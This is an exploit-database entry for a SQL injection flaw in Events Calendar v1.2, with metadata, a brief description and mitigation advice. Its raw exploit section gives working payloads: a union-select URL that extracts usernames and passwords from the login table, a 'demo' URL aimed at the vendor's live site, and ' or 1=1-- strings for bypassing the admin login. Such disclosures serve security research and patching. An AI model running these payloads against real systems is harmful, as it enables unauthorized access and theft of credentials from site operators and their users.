Events Calendar v 1.2

vendor:

Events Calendar

by:

Cyb3r-1sT

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Events Calendar

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: No

Related CWE: N/A

CPE: a:developiteasy:events_calendar:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

An unauthenticated attacker can exploit a SQL injection vulnerability in Events Calendar v 1.2 to gain access to the application's database. By sending a specially crafted HTTP request, an attacker can inject malicious SQL code into the application's query, allowing them to access the application's database. This can be used to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent malicious code from being executed.

Source

Exploit-DB raw data:

                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
                   
<<!>> Groups : InjEctOr5 T3am 

<<!>> site : www.tryag.cc/cc

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================


<<->> script      : Events Calendar v 1.2 

<<->> script site : www.developiteasy.com/events-calendar-v-1.2-p-65.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13               



=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>

 >>>> www.site.me/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
      
 >>> demo ::: www.developiteasy.com/events_calendar/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--


<<->> Exploit <<->> bypass <<->>
 
        >>>> www.developiteasy.com/events_calendar/admin
        
        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
        
        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================


<<->> All freinds and all muslims

# milw0rm.com [2008-11-06]